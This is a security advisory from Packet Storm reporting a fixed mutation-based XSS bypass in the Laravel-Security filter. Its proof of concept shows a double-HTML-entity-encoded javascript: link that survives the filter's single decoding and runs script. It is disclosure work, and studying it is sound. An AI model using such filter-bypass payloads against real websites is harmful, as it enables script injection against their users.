Lavarel-Security XSS Filter Bypass

2014-04-29T00:00:00
ID PACKETSTORM:126388
Type packetstorm
Reporter Rafay Baloch
Modified 2014-04-29T00:00:00

Description

                                        
                                            `*#Product: Lavarel-Security XSS Filter Bypass*  
*#Vulnerability: Mutation Based XSS Bypass *  
*#Impact: Medium/High*  
*#Authors: Rafay Baloch *  
*#Company: RHAinfoSEC *  
*#Website: http://rhainfosec.com  
*#Status: Fixed*  
  
*=========*  
*Description*  
*=========*  
  
Laravel Security is a port of the security class from Codeigniter 2.1 for  
Laravel 4.1. It relies upon a blacklist approach to filter out common  
malicious inputs.  
  
*=========*  
*Vulnerability*  
*==========*  
  
The vulnerability lies in the fact that the XSS filter was decoding HTML  
entities, therefore based upon this fact it was  
possible to construct a payload that would successfully bypass the  
filtering mechanisms and execute javascript.  
  
*=============*  
*Proof of concept*  
*=============*  
  
During intial test the following input was provided:  
  
<a  
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>  
  
The filter decodes the HTML entities and hence the attack was being  
blocked.  
  
After Decoding:  
  
<a href="javascript:alert(1)">Clickhere</a>  
  
Next, we double encoded the entities:  
  
<a  
href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>  
  
And since the filter would decode the entities once, we are left with the  
following:  
  
  
<a  
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>  
  
Which is perfectly a valid syntax inside of href context and would execute  
javascript.  
  
*===*  
*Fix*  
*===*  
  
The vulnerability has been fixed, the latest version doesn't decode HTML  
entites and hence the attack is mitigated.  
  
  
*==========*  
*References*  
*==========*  
  
https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413  
`